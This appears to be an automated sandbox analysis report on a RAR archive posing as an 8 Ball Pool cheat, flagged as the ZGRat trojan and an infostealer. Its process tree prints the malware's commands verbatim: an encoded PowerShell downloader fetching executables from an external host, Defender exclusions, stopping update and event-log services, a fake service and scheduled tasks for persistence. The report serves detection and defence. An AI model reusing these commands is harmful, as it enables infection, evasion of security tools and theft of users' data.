Overview

overview

10

Static

static

1

8bp line cheto.rar

windows7-x64

10

8bp line cheto.rar

windows10-2004-x64

3

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    14-05-2024 09:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8bp line cheto.rar

  • Size

    2.4MB

  • MD5

    b56819fd25d445b1496395660c706dc0

  • SHA1

    787c59e095cb10589a8f6480a1f8ffee30c5cb8f

  • SHA256

    da628a12427eaf7ade463bf0fa497a3153deed4aded462f3a58e93ba2288f35c

  • SHA512

    c9b6f26fa00c314660341e43a1df32d2a67faff6fc3e00976a5231cb82afded4a88b4ee9dab9771ee3bbab27beb0b545caf2f2c2462ca928047b55a9c2df371a

  • SSDEEP

    49152:xUSIhr4gqAqn0Jj3GOdcdp7XTFbE3Y8QaToR/22rzlS4HLlH0JMYtm6b8l:xRIF4Sqn0blyjjF4PQ/2GzlfqJD78l

Score
10/10
zgratevasionexecutionpersistenceratspywarestealer

Malware Config

Signatures

  • Detect ZGRat V1 4 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\8bp line cheto.rar"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\8bp line cheto.rar"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2672
      • C:\Users\Admin\AppData\Local\Temp\7zO07A70E46\8bp_cheto.exe
        "C:\Users\Admin\AppData\Local\Temp\7zO07A70E46\8bp_cheto.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2452
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAagB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdABqAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbAByAGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABnAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwA4AF8AQgBhAGwAbABfAFAAbwBvAGwAXwBDAGgAZQB0AG8ALgBlAHgAZQAnACwAIAA8ACMAZwB1AGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB1AGoAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AHIAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA4AF8AQgBhAGwAbABfAFAAbwBvAGwAXwBDAGgAZQB0AG8ALgBlAHgAZQAnACkAKQA8ACMAYwBtAGMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAHIAZQBtAG8AdABlAC8AOABTAGUAcgB2AGUAcgBkAGgAYwBwAC4AZQB4AGUAJwAsACAAPAAjAHcAdQBiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQBtAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABxAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOABTAGUAcgB2AGUAcgBkAGgAYwBwAC4AZQB4AGUAJwApACkAPAAjAHMAcQBpACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBtAC8AYwBvAG4AaABvAHMAdAA4AC4AZQB4AGUAJwAsACAAPAAjAG0AeABjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgBmAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwBuAGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdAA4AC4AZQB4AGUAJwApACkAPAAjAHQAdQBnACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAYwBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAGYAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA4AF8AQgBhAGwAbABfAFAAbwBvAGwAXwBDAGgAZQB0AG8ALgBlAHgAZQAnACkAPAAjAGcAYQB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHEAaABnACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB3AGQAbgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA4AFMAZQByAHYAZQByAGQAaABjAHAALgBlAHgAZQAnACkAPAAjAHoAcwBlACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHIAagBhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBpAGUAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0ADgALgBlAHgAZQAnACkAPAAjAHMAZABiACMAPgA="
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2728
          • C:\Users\Admin\AppData\Roaming\8_Ball_Pool_Cheto.exe
            "C:\Users\Admin\AppData\Roaming\8_Ball_Pool_Cheto.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:1632
          • C:\Users\Admin\AppData\Roaming\8Serverdhcp.exe
            "C:\Users\Admin\AppData\Roaming\8Serverdhcp.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1008
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\BridgeChainserverwinDriver\s6qD0S6dHcOUHMjR5EUKU.vbe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1984
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\BridgeChainserverwinDriver\csem9dbN8vZV.bat" "
                7⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1440
                • C:\BridgeChainserverwinDriver\8Serverdhcp.exe
                  "C:\BridgeChainserverwinDriver/8Serverdhcp.exe"
                  8⤵
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1404
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\services.exe'
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:112
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\System.exe'
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1744
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\schemas\WCN\lsm.exe'
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2892
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\BridgeChainserverwinDriver\winlogon.exe'
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1540
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\csrss.exe'
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1372
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DU95VhgWai.bat"
                    9⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2392
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      10⤵
                        PID:1896
                      • C:\Windows\system32\PING.EXE
                        ping -n 10 localhost
                        10⤵
                        • Runs ping.exe
                        PID:2352
                      • C:\Users\Default User\services.exe
                        "C:\Users\Default User\services.exe"
                        10⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2220
            • C:\Users\Admin\AppData\Roaming\conhost8.exe
              "C:\Users\Admin\AppData\Roaming\conhost8.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3016
              • C:\Users\Admin\AppData\Roaming\.conhost8.exe
                "C:\Users\Admin\AppData\Roaming\.conhost8.exe"
                6⤵
                • Executes dropped EXE
                • Drops file in System32 directory
                PID:676
                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2800
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                  7⤵
                    PID:1880
                    • C:\Windows\system32\wusa.exe
                      wusa /uninstall /kb:890830 /quiet /norestart
                      8⤵
                      • Drops file in Windows directory
                      PID:1536
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop UsoSvc
                    7⤵
                    • Launches sc.exe
                    PID:1488
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                    7⤵
                    • Launches sc.exe
                    PID:2320
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop wuauserv
                    7⤵
                    • Launches sc.exe
                    PID:2564
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop bits
                    7⤵
                    • Launches sc.exe
                    PID:1524
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop dosvc
                    7⤵
                    • Launches sc.exe
                    PID:1728
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    7⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2920
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    7⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2924
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    7⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1500
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    7⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2764
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe delete "driverupdate"
                    7⤵
                    • Launches sc.exe
                    PID:1748
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                    7⤵
                    • Launches sc.exe
                    PID:1512
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop eventlog
                    7⤵
                    • Launches sc.exe
                    PID:2092
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe start "driverupdate"
                    7⤵
                    • Launches sc.exe
                    PID:1568
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\services.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1680
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1908
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:3060
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\System.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1460
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\System.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2992
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\System.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:892
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "lsml" /sc MINUTE /mo 13 /tr "'C:\Windows\schemas\WCN\lsm.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1564
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\schemas\WCN\lsm.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1452
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "lsml" /sc MINUTE /mo 6 /tr "'C:\Windows\schemas\WCN\lsm.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1644
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\BridgeChainserverwinDriver\winlogon.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2608
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\BridgeChainserverwinDriver\winlogon.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2752
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\BridgeChainserverwinDriver\winlogon.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:3052
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\csrss.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2224
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2692
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2244
      • C:\ProgramData\VC_redist.x64.exe
        C:\ProgramData\VC_redist.x64.exe
        1⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        PID:2592
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:2664
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          2⤵
            PID:1936
            • C:\Windows\system32\wusa.exe
              wusa /uninstall /kb:890830 /quiet /norestart
              3⤵
              • Drops file in Windows directory
              PID:2752
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop UsoSvc
            2⤵
            • Launches sc.exe
            PID:1896
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop WaaSMedicSvc
            2⤵
            • Launches sc.exe
            PID:1576
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop wuauserv
            2⤵
            • Launches sc.exe
            PID:1944
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop bits
            2⤵
            • Launches sc.exe
            PID:2460
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop dosvc
            2⤵
            • Launches sc.exe
            PID:2072
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1952
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2544
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:848
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1636
          • C:\Windows\system32\conhost.exe
            C:\Windows\system32\conhost.exe
            2⤵
              PID:2492

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\BridgeChainserverwinDriver\csem9dbN8vZV.bat
            Filesize

            96B

            MD5

            23687194e3bf3dc3d826c00237789bcd

            SHA1

            b702404f2f6a5866b187bc592ede284b3d88ed3f

            SHA256

            7120827c18817b4d40c3be5a799d5dc9f6b69da8c81c1f30d9ba739d52e939e8

            SHA512

            ca75db93b2e810010a53b0513f3744d4a4041b03b78ba8c9b0479be4779186d0aba0454b59565f7d309358156083136d5ddb21c74573d8e01773c74c1f972596

            Download Submit

          • C:\BridgeChainserverwinDriver\s6qD0S6dHcOUHMjR5EUKU.vbe
            Filesize

            216B

            MD5

            f97c40bdfc065637f7a2301826e591fb

            SHA1

            9882ccc7779be4118dc30bc832926ee480239086

            SHA256

            2cbfdf06e4529d5c54aa9c2c30534918cc3a6b434219e7140f8f715c2ca4f82f

            SHA512

            0d109fa7f0d9c1fe74780bea91159207268a2e702f2f54d8410cd056792aa6d198ebedb4e0d659e7d47e557d2d9d94c06b4309bdabaf64e73e3be2fba80ff8b9

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
            Filesize

            68KB

            MD5

            29f65ba8e88c063813cc50a4ea544e93

            SHA1

            05a7040d5c127e68c25d81cc51271ffb8bef3568

            SHA256

            1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

            SHA512

            e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\7zO07A70E46\8bp_cheto.exe
            Filesize

            2.5MB

            MD5

            ff26c2f6a7217b63f1fb50ce5b6c1aa8

            SHA1

            a04ff23aaf1839fbd6554c0d7502ac8c098ca554

            SHA256

            d32be77502806d0e24e6f599ec4277b4c5289cd4e51a244cb4b91b38a6e410e4

            SHA512

            ddcb5ce215f699b8e32aadf135579b6085fcad22298c754cad39e5963f1b3ffeb72b681546ab9507951b3eb3216181e7e118a0d72fc17841df0877bcc8661533

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Cab8AA5.tmp
            Filesize

            65KB

            MD5

            ac05d27423a85adc1622c714f2cb6184

            SHA1

            b0fe2b1abddb97837ea0195be70ab2ff14d43198

            SHA256

            c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

            SHA512

            6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\DU95VhgWai.bat
            Filesize

            162B

            MD5

            da9ab047135325b1ed1d11cd1e44bcb1

            SHA1

            adffd8462717dd764f19c617fdfb64eb29db864d

            SHA256

            be2263a338223b4ac2d9e560b705a42607b06e42859e58591167c4c8c065568e

            SHA512

            a00fc8aae8e9a14d9a32e873cc9455064fa56843aff5951eb0be54ce7a69f94090fb566b007f8e9ac6c12f2056720eccfc35e8a814c38c7f4113d43554eb1a14

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Tar8B86.tmp
            Filesize

            177KB

            MD5

            435a9ac180383f9fa094131b173a2f7b

            SHA1

            76944ea657a9db94f9a4bef38f88c46ed4166983

            SHA256

            67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

            SHA512

            1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
            Filesize

            7KB

            MD5

            5d757efc3d5da7c0f6ab8845e446e5fa

            SHA1

            7364efac5c5c9868a54f6808adc036a2c9f74bb5

            SHA256

            550f5d490ae2247e948332fbf1e6e0e861bf31cbc797e4d37ce30141f3d59042

            SHA512

            05ef7c3dc6f6036245242a6a72ed02d5b0346823a27adebced46944eb80c4001c0b8e5c5b53e01920c539b236e1c0112467eb262e549021ffcaca4e28cdc86e8

            Download Submit

          • \BridgeChainserverwinDriver\8Serverdhcp.exe
            Filesize

            2.0MB

            MD5

            743f6a52665426055c9fda13d40fb782

            SHA1

            26beed614bb74f4f04f5aa389c0a51b0064a8723

            SHA256

            d9c39ba21c50bd5cb6eeddd268ad907f682941af43dc1d5897e9b4921608a07b

            SHA512

            67f1c1890f5c5e75a14600eca0335c88144e38411d715b189dc8d9df00e27282d1cf6ba611b514cc27b7e6d92bf200f045e3ab98bb266ff9f4b71d0a643f2196

            Download Submit

          • \Users\Admin\AppData\Roaming\8Serverdhcp.exe
            Filesize

            2.3MB

            MD5

            0ff1003768cff5135a396f0a01e6b551

            SHA1

            a88c589fc5420c87e1411a364e2386fb4b9b5aa8

            SHA256

            927bed16b09f34d494f87aa49255741ad69523fda030bd48ae73f9cc24ea33c8

            SHA512

            c33e4440a4f974e04dfabb98ebb8d1ad2c9fb8d8d558ce33a1ebfd1350fa9e6b6e398123492fa6e522264746a9c7b513952c2ca744076e8e3569c2e248537bdd

            Download Submit

          • \Users\Admin\AppData\Roaming\8_Ball_Pool_Cheto.exe
            Filesize

            901KB

            MD5

            b5ca92538a485317ce5c4dff6c5fd08f

            SHA1

            2d61611f3e34cdfc4d7442f39c7a2818bc0f627d

            SHA256

            0aff775071bc938ee44ac07e20e4cabddd5235edb34a437c4d7006a8dab91a5e

            SHA512

            e3318ac45418d83baf0d5c84ce1714e7367bd4e3e8ecb98cc801ef1636a2098d07a718a83bcccbb0bbf725c9d3f1e066501e86171eb45e7167afbe280c6101f6

            Download Submit

          • \Users\Admin\AppData\Roaming\conhost8.exe
            Filesize

            2.9MB

            MD5

            229bb3196bb02dc4dadc838c051f1589

            SHA1

            d76da675b39fee99df3b2c2e7f6428d78cae3f99

            SHA256

            f59201c2847549ec8dce9e3250c2acc5ec45a9586c408f57bd29a2cbb60786dd

            SHA512

            be477b12ea86ff4b3394b33a65180fda5dfd4a42f06794186347ad8e6c3006522d24ed71642071cbe0e3ce08f42891653092b5c5cab65d76ceb8094ba0a9dd6b

            Download Submit

          • memory/1372-208-0x000000001B620000-0x000000001B902000-memory.dmp

            Filesize

            2.9MB

            Download

          • memory/1404-170-0x0000000000420000-0x000000000042E000-memory.dmp

            Filesize

            56KB

            Download

          • memory/1404-168-0x0000000000460000-0x0000000000478000-memory.dmp

            Filesize

            96KB

            Download

          • memory/1404-166-0x0000000000440000-0x000000000045C000-memory.dmp

            Filesize

            112KB

            Download

          • memory/1404-172-0x0000000000430000-0x000000000043E000-memory.dmp

            Filesize

            56KB

            Download

          • memory/1404-174-0x0000000000480000-0x000000000048C000-memory.dmp

            Filesize

            48KB

            Download

          • memory/1404-176-0x00000000004A0000-0x00000000004AE000-memory.dmp

            Filesize

            56KB

            Download

          • memory/1404-178-0x00000000004B0000-0x00000000004BC000-memory.dmp

            Filesize

            48KB

            Download

          • memory/1404-164-0x0000000000410000-0x000000000041E000-memory.dmp

            Filesize

            56KB

            Download

          • memory/1404-162-0x00000000008B0000-0x0000000000AB4000-memory.dmp

            Filesize

            2.0MB

            Download

